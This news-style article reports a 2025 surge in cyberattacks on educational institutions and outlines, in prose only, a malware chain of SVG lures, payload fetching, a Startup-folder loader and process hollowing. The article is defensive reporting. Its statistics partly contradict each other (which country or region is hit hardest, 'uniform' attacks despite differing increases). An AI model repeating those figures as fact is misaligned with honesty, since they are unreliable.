Increase in Cyber Assaults on Educational Institutions Observed Post Summer Break
In the first seven months of 2025, the education sector has encountered a significant increase in cyber attacks, with Italy leading the pack at 8,593 attacks per organization, followed closely by Hong Kong, Portugal, and the United States.
The malware responsible for these attacks is a .NET executable that decrypts in memory and drops a lightweight malware loader into the Windows Startup folder for persistence. The malware's multi-stage process is designed for persistence and evasion, making it difficult for security systems to detect and neutralize.
The malware is often delivered via seemingly benign SVG attachments or QR-encoded PDF forms, enabling credential theft and the deployment of secondary loaders. This could further compromise networks and exfiltrate sensitive data.
Detection evasion is achieved using process hollowing, where the loader spawns a legitimate process (e.g., svchost[.]exe), unmaps its memory, and injects malicious code into the hollowed instance.
The emergence of themed phishing campaigns timed to the back-to-school rush has amplified both the volume and sophistication of these threats. Check Point analysts have noted that the scale and timing of these surges indicate attackers are leveraging the seasonal spike in digital activity to maximize impact and evade detection.
The United States experienced the most cyberattacks against educational institutions in a single country from January to July 2025, with multiple incidents reported across various states including California, Alabama, and Tennessee.
North America saw the steepest spike, rising 67 percent year-over-year, while Europe and Africa recorded increases of 48 percent and 56 percent respectively. Asia-Pacific organizations faced the heaviest onslaught, with an average of 7,869 weekly attacks per organization.
The malware's infection chain involves a typo-squatted domain. The SVG file, when opened, invokes an embedded JavaScript that fetches a payload from a typo-squatted domain. Check Point researchers have identified multiple campaigns where these malicious activities occurred.
From January to July 2025, organizations in the education sector experienced an average of 4,356 weekly cyber attacks, marking a 41 percent year-over-year increase. The attacks range from credential-harvesting phishing domains to sophisticated delivery of malicious code aimed at compromising networks and exfiltrating sensitive data.
The malware's impersonation pages often host pages that mimic Microsoft's login interfaces. In July alone, over 18,000 new domains mimicking academic institutions were registered, with one in every 57 flagged as malicious or suspicious.
These attacks have struck uniformly across all regions, underscoring the global nature of this cyber threat. As the new academic year begins, it is crucial for educational institutions to strengthen their cybersecurity measures to protect against these increasingly sophisticated attacks.
